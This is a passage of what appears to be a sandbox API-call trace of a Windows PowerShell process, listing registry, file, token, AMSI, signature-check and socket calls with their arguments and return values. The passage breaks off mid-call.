SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b980) returned 1 [0146.427] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xb156f8ba60 | out: lpFileInformation=0xb156f8ba60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0146.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b940) returned 1 [0146.427] WldpGetLockdownPolicy () returned 0x0 [0146.427] GetSystemInfo (in: lpSystemInfo=0xb156f8bac0 | out: lpSystemInfo=0xb156f8bac0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0146.428] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8b9c8 | out: phkResult=0xb156f8b9c8*=0x720) returned 0x0 [0146.428] RegQueryValueExW (in: hKey=0x720, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xb156f8ba18, lpData=0x0, lpcbData=0xb156f8ba10*=0x0 | out: lpType=0xb156f8ba18*=0x0, lpData=0x0, lpcbData=0xb156f8ba10*=0x0) returned 0x2 [0146.428] RegCloseKey (hKey=0x720) returned 0x0 [0146.428] CloseHandle (hObject=0x704) returned 1 [0146.743] CoCreateGuid (in: pguid=0xb156f8bbd8 | out: pguid=0xb156f8bbd8*(Data1=0xe30a2368, Data2=0xb6b6, Data3=0x4709, Data4=([0]=0xbb, [1]=0x4, [2]=0x5b, [3]=0x9a, [4]=0x63, [5]=0x36, [6]=0xe5, [7]=0xfc))) returned 0x0 [0146.744] GetCurrentProcess () returned 0xffffffffffffffff [0146.744] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8baf8 | out: TokenHandle=0xb156f8baf8*=0x6fc) returned 1 [0146.744] GetTokenInformation (in: TokenHandle=0x6fc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8bb98 | out: TokenInformation=0x0, ReturnLength=0xb156f8bb98) returned 0 [0146.744] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1e351359610 [0146.744] GetTokenInformation (in: TokenHandle=0x6fc, TokenInformationClass=0x8, TokenInformation=0x1e351359610, TokenInformationLength=0x4, ReturnLength=0xb156f8bb98 | out: TokenInformation=0x1e351359610, ReturnLength=0xb156f8bb98) returned 1 [0146.744] LocalFree (hMem=0x1e351359610) returned 0x0 [0146.744] DuplicateTokenEx (in: hExistingToken=0x6fc, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xb156f8bbf8 | out: phNewToken=0xb156f8bbf8*=0x704) returned 1 [0146.744] CheckTokenMembership (in: TokenHandle=0x704, SidToCheck=0x1e339425eb8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xb156f8bc00 | out: IsMember=0xb156f8bc00) returned 1 [0146.744] CloseHandle (hObject=0x704) returned 1 [0146.750] AmsiScanString () returned 0x80070015 [0146.810] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xb156f8b230, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0146.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b680) returned 1 [0146.810] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b760 | out: lpFileInformation=0xb156f8b760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0146.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b640) returned 1 [0146.810] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xb156f8b1e0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0146.810] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xb156f8b110, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0146.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b560) returned 1 [0146.811] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b640 | out: lpFileInformation=0xb156f8b640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0146.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b520) returned 1 [0146.811] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xb156f8b010, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0146.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b4f0) returned 1 [0146.811] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x704 [0146.811] GetFileType (hFile=0x704) returned 0x1 [0146.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b460) returned 1 [0146.811] GetFileType (hFile=0x704) returned 0x1 [0146.811] WTGetSignatureInfo () returned 0x0 [0146.831] CertDuplicateCertificateContext (pCertContext=0x1e3513ec520) returned 0x1e3513ec520 [0146.832] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8b588 | out: phkResult=0xb156f8b588*=0x754) returned 0x0 [0146.832] RegQueryValueExW (in: hKey=0x754, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8b5d8, lpData=0x0, lpcbData=0xb156f8b5d0*=0x0 | out: lpType=0xb156f8b5d8*=0x1, lpData=0x0, lpcbData=0xb156f8b5d0*=0x56) returned 0x0 [0146.832] RegQueryValueExW (in: hKey=0x754, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8b5d8, lpData=0x1e33944c0d8, lpcbData=0xb156f8b5d0*=0x56 | out: lpType=0xb156f8b5d8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8b5d0*=0x56) returned 0x0 [0146.832] RegCloseKey (hKey=0x754) returned 0x0 [0146.832] CoTaskMemAlloc (cb=0x10) returned 0x1e3513469e0 [0146.832] CoTaskMemAlloc (cb=0x50) returned 0x1e3514130c0 [0146.832] WinVerifyTrust () returned 0x0 [0146.833] CoTaskMemFree (pv=0x1e3514130c0) [0146.833] CoTaskMemFree (pv=0x1e3513469e0) [0146.833] CertFreeCertificateContext (pCertContext=0x1e3513ec520) returned 1 [0146.833] CloseHandle (hObject=0x704) returned 1 [0146.833] CoCreateGuid (in: pguid=0xb156f8b558 | out: pguid=0xb156f8b558*(Data1=0xb825b2af, Data2=0x5f1a, Data3=0x4031, Data4=([0]=0xa5, [1]=0x62, [2]=0xc1, [3]=0x27, [4]=0xaf, [5]=0xe3, [6]=0xc, [7]=0xa0))) returned 0x0 [0147.247] CoCreateGuid (in: pguid=0xb156f8b558 | out: pguid=0xb156f8b558*(Data1=0xe2b2f00f, Data2=0x2550, Data3=0x4642, Data4=([0]=0xbf, [1]=0x34, [2]=0x5, [3]=0xdc, [4]=0x5c, [5]=0xc9, [6]=0xbf, [7]=0xb9))) returned 0x0 [0147.247] CoCreateGuid (in: pguid=0xb156f8b558 | out: pguid=0xb156f8b558*(Data1=0x6d57ae04, Data2=0xcde6, Data3=0x47c0, Data4=([0]=0x93, [1]=0xc4, [2]=0xab, [3]=0x0, [4]=0x86, [5]=0x46, [6]=0xb9, [7]=0x4c))) returned 0x0 [0147.579] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1e3513f64d0 [0147.580] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1e3513f54e0 [0147.710] CoCreateGuid (in: pguid=0xb156f8b558 | out: pguid=0xb156f8b558*(Data1=0xe8104bd8, Data2=0xbb3f, Data3=0x4239, Data4=([0]=0x8f, [1]=0xe1, [2]=0x11, [3]=0x14, [4]=0x58, [5]=0xf1, [6]=0x41, [7]=0xf8))) returned 0x0 [0147.996] CoCreateGuid (in: pguid=0xb156f8b558 | out: pguid=0xb156f8b558*(Data1=0xca80bc37, Data2=0x4f01, Data3=0x4248, Data4=([0]=0xb9, [1]=0xc5, [2]=0x16, [3]=0x44, [4]=0x9c, [5]=0xfb, [6]=0x5, [7]=0xa1))) returned 0x0 [0148.305] CoCreateGuid (in: pguid=0xb156f8b558 | out: pguid=0xb156f8b558*(Data1=0x304457d0, Data2=0x8517, Data3=0x4c7c, Data4=([0]=0x91, [1]=0x1e, [2]=0x26, [3]=0x6d, [4]=0xca, [5]=0xdb, [6]=0xfa, [7]=0xd6))) returned 0x0 [0148.305] CoCreateGuid (in: pguid=0xb156f8b558 | out: pguid=0xb156f8b558*(Data1=0x872b453a, Data2=0x40ce, Data3=0x4352, Data4=([0]=0x88, [1]=0xb6, [2]=0x50, [3]=0x77, [4]=0xd3, [5]=0x82, [6]=0x24, [7]=0x10))) returned 0x0 [0148.305] CoCreateGuid (in: pguid=0xb156f8b558 | out: pguid=0xb156f8b558*(Data1=0x32fde2d, Data2=0x29b4, Data3=0x4613, Data4=([0]=0x95, [1]=0x83, [2]=0x23, [3]=0xa4, [4]=0xb3, [5]=0x95, [6]=0xb0, [7]=0x29))) returned 0x0 [0148.369] CoCreateGuid (in: pguid=0xb156f8b558 | out: pguid=0xb156f8b558*(Data1=0x85ea6272, Data2=0xe854, Data3=0x411c, Data4=([0]=0xbf, [1]=0xe6, [2]=0xc9, [3]=0xea, [4]=0x4c, [5]=0x5d, [6]=0x7, [7]=0x42))) returned 0x0 [0148.537] CoTaskMemAlloc (cb=0x20e) returned 0x1e3514356c0 [0148.537] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e3514356c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0148.537] CoTaskMemFree (pv=0x1e3514356c0) [0148.635] EtwEventActivityIdControl () returned 0x0 [0148.636] EtwEventActivityIdControl () returned 0x0 [0148.636] EtwEventActivityIdControl () returned 0x0 [0148.708] EtwEventActivityIdControl () returned 0x0 [0148.710] CoTaskMemAlloc (cb=0x20e) returned 0x1e3514347e0 [0148.710] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e3514347e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0148.710] CoTaskMemFree (pv=0x1e3514347e0) [0148.711] EtwEventActivityIdControl () returned 0x0 [0148.711] EtwEventActivityIdControl () returned 0x0 [0148.711] EtwEventActivityIdControl () returned 0x0 [0148.716] EtwEventActivityIdControl () returned 0x0 [0148.716] CoTaskMemAlloc (cb=0x20e) returned 0x1e3514356c0 [0148.716] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e3514356c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0148.717] CoTaskMemFree (pv=0x1e3514356c0) [0148.717] EtwEventActivityIdControl () returned 0x0 [0148.717] EtwEventActivityIdControl () returned 0x0 [0148.717] EtwEventActivityIdControl () returned 0x0 [0148.717] EtwEventActivityIdControl () returned 0x0 [0148.717] CoTaskMemAlloc (cb=0x20e) returned 0x1e3514343a0 [0148.717] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e3514343a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0148.717] CoTaskMemFree (pv=0x1e3514343a0) [0148.718] EtwEventActivityIdControl () returned 0x0 [0148.718] EtwEventActivityIdControl () returned 0x0 [0148.718] EtwEventActivityIdControl () returned 0x0 [0148.766] EtwEventActivityIdControl () returned 0x0 [0148.766] CoTaskMemAlloc (cb=0x20e) returned 0x1e351438360 [0148.767] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e351438360, nSize=0x105 | out: lpBuffer="") returned 0x0 [0148.767] CoTaskMemFree (pv=0x1e351438360) [0148.767] EtwEventActivityIdControl () returned 0x0 [0148.767] EtwEventActivityIdControl () returned 0x0 [0148.767] EtwEventActivityIdControl () returned 0x0 [0148.767] EtwEventActivityIdControl () returned 0x0 [0148.767] CoTaskMemAlloc (cb=0x20e) returned 0x1e351437f20 [0148.767] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e351437f20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0148.767] CoTaskMemFree (pv=0x1e351437f20) [0148.768] EtwEventActivityIdControl () returned 0x0 [0148.768] EtwEventActivityIdControl () returned 0x0 [0148.768] EtwEventActivityIdControl () returned 0x0 [0148.768] EtwEventActivityIdControl () returned 0x0 [0149.026] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8d8d8 | out: phkResult=0xb156f8d8d8*=0x6fc) returned 0x0 [0149.026] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x0, lpcbData=0xb156f8d920*=0x0 | out: lpType=0xb156f8d928*=0x1, lpData=0x0, lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.026] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x1e33961e0b0, lpcbData=0xb156f8d920*=0x56 | out: lpType=0xb156f8d928*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.026] RegCloseKey (hKey=0x6fc) returned 0x0 [0149.027] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8d8d8 | out: phkResult=0xb156f8d8d8*=0x6fc) returned 0x0 [0149.027] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x0, lpcbData=0xb156f8d920*=0x0 | out: lpType=0xb156f8d928*=0x1, lpData=0x0, lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.027] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x1e33961e458, lpcbData=0xb156f8d920*=0x56 | out: lpType=0xb156f8d928*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.027] RegCloseKey (hKey=0x6fc) returned 0x0 [0149.027] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8d8d8 | out: phkResult=0xb156f8d8d8*=0x6fc) returned 0x0 [0149.027] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x0, lpcbData=0xb156f8d920*=0x0 | out: lpType=0xb156f8d928*=0x1, lpData=0x0, lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.027] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x1e33961e7d8, lpcbData=0xb156f8d920*=0x56 | out: lpType=0xb156f8d928*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.027] RegCloseKey (hKey=0x6fc) returned 0x0 [0149.028] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8d8d8 | out: phkResult=0xb156f8d8d8*=0x6fc) returned 0x0 [0149.028] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x0, lpcbData=0xb156f8d920*=0x0 | out: lpType=0xb156f8d928*=0x1, lpData=0x0, lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.028] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x1e33961eb70, lpcbData=0xb156f8d920*=0x56 | out: lpType=0xb156f8d928*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.028] RegCloseKey (hKey=0x6fc) returned 0x0 [0149.028] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8d8d8 | out: phkResult=0xb156f8d8d8*=0x6fc) returned 0x0 [0149.028] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x0, lpcbData=0xb156f8d920*=0x0 | out: lpType=0xb156f8d928*=0x1, lpData=0x0, lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.028] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x1e33961ef18, lpcbData=0xb156f8d920*=0x56 | out: lpType=0xb156f8d928*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.028] RegCloseKey (hKey=0x6fc) returned 0x0 [0149.029] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8d8d8 | out: phkResult=0xb156f8d8d8*=0x6fc) returned 0x0 [0149.029] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x0, lpcbData=0xb156f8d920*=0x0 | out: lpType=0xb156f8d928*=0x1, lpData=0x0, lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.029] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x1e33961f2c0, lpcbData=0xb156f8d920*=0x56 | out: lpType=0xb156f8d928*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.029] RegCloseKey (hKey=0x6fc) returned 0x0 [0149.029] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8d8d8 | out: phkResult=0xb156f8d8d8*=0x6fc) returned 0x0 [0149.029] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x0, lpcbData=0xb156f8d920*=0x0 | out: lpType=0xb156f8d928*=0x1, lpData=0x0, lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.029] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d928, lpData=0x1e33961f640, lpcbData=0xb156f8d920*=0x56 | out: lpType=0xb156f8d928*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8d920*=0x56) returned 0x0 [0149.030] RegCloseKey (hKey=0x6fc) returned 0x0 [0149.030] EtwEventActivityIdControl () returned 0x0 [0149.030] EtwEventActivityIdControl () returned 0x0 [0149.031] SetEvent (hEvent=0x73c) returned 1 [0149.031] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8dce0*=0x73c, lpdwindex=0xb156f8dab4 | out: lpdwindex=0xb156f8dab4) returned 0x0 [0149.037] CoTaskMemAlloc (cb=0x20e) returned 0x1e3514314e0 [0149.037] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e3514314e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0149.037] CoTaskMemFree (pv=0x1e3514314e0) [0149.039] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0149.039] GetFileType (hFile=0x28) returned 0x2 [0149.040] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8dfc8 | out: lpConsoleScreenBufferInfo=0xb156f8dfc8) returned 1 [0149.041] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8dfc8 | out: lpConsoleScreenBufferInfo=0xb156f8dfc8) returned 1 [0149.142] CoTaskMemAlloc (cb=0x20e) returned 0x1e3514310a0 [0149.142] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e3514310a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0149.142] CoTaskMemFree (pv=0x1e3514310a0) [0149.176] EtwEventActivityIdControl () returned 0x0 [0149.176] EtwEventActivityIdControl () returned 0x0 [0149.176] EtwEventActivityIdControl () returned 0x0 [0149.313] EtwEventActivityIdControl () returned 0x0 [0149.313] EtwEventActivityIdControl () returned 0x0 [0149.313] EtwEventActivityIdControl () returned 0x0 [0149.364] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0xb156f8e1a8 | out: pFixedInfo=0x0, pOutBufLen=0xb156f8e1a8) returned 0x6f [0149.429] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1e3512ff7f0 [0149.429] GetNetworkParams (in: pFixedInfo=0x1e3512ff7f0, pOutBufLen=0xb156f8e1a8 | out: pFixedInfo=0x1e3512ff7f0, pOutBufLen=0xb156f8e1a8) returned 0x0 [0149.441] LocalFree (hMem=0x1e3512ff7f0) returned 0x0 [0149.460] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x77c [0149.460] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x768 [0149.477] GetCurrentProcess () returned 0xffffffffffffffff [0149.477] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8db38 | out: TokenHandle=0xb156f8db38*=0x784) returned 1 [0149.482] GetCurrentProcess () returned 0xffffffffffffffff [0149.482] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8db48 | out: TokenHandle=0xb156f8db48*=0x780) returned 1 [0149.496] QueryPerformanceFrequency (in: lpFrequency=0x7ffb70724ff8 | out: lpFrequency=0x7ffb70724ff8*=100000000) returned 1 [0149.497] QueryPerformanceCounter (in: lpPerformanceCount=0xb156f8e1f8 | out: lpPerformanceCount=0xb156f8e1f8*=3492611437834) returned 1 [0149.501] GetCurrentProcess () returned 0xffffffffffffffff [0149.501] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8da38 | out: TokenHandle=0xb156f8da38*=0x788) returned 1 [0149.504] GetCurrentProcess () returned 0xffffffffffffffff [0149.504] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8da48 | out: TokenHandle=0xb156f8da48*=0x78c) returned 1 [0149.515] GetCurrentProcess () returned 0xffffffffffffffff [0149.515] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8daa8 | out: TokenHandle=0xb156f8daa8*=0x790) returned 1 [0149.518] GetCurrentProcess () returned 0xffffffffffffffff [0149.518] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8dab8 | out: TokenHandle=0xb156f8dab8*=0x794) returned 1 [0149.527] GetCurrentProcess () returned 0xffffffffffffffff [0149.527] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8dfb8 | out: TokenHandle=0xb156f8dfb8*=0x798) returned 1 [0149.540] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8bf98 | out: phkResult=0xb156f8bf98*=0x79c) returned 0x0 [0149.541] RegQueryValueExW (in: hKey=0x79c, lpValueName="InstallationType", lpReserved=0x0, lpType=0xb156f8bfe8, lpData=0x0, lpcbData=0xb156f8bfe0*=0x0 | out: lpType=0xb156f8bfe8*=0x1, lpData=0x0, lpcbData=0xb156f8bfe0*=0xe) returned 0x0 [0149.541] RegQueryValueExW (in: hKey=0x79c, lpValueName="InstallationType", lpReserved=0x0, lpType=0xb156f8bfe8, lpData=0x1e33965abe0, lpcbData=0xb156f8bfe0*=0xe | out: lpType=0xb156f8bfe8*=0x1, lpData="Client", lpcbData=0xb156f8bfe0*=0xe) returned 0x0 [0149.541] RegCloseKey (hKey=0x79c) returned 0x0 [0149.601] CoTaskMemAlloc (cb=0xcd0) returned 0x1e35141fbb0 [0149.603] RasEnumConnectionsW (in: param_1=0x1e35141fbb0, param_2=0xb156f8df60, param_3=0xb156f8df68 | out: param_1=0x1e35141fbb0, param_2=0xb156f8df60, param_3=0xb156f8df68) returned 0x0 [0149.623] CoTaskMemFree (pv=0x1e35141fbb0) [0149.629] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xb156f8dca8 | out: lpWSAData=0xb156f8dca8) returned 0 [0149.639] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x7e4 [0149.700] setsockopt (s=0x7e4, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0149.700] closesocket (s=0x7e4) returned 0 [0149.701] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x7e4 [0149.702] setsockopt (s=0x7e4, level=65535, optname=128, optval="\x01", 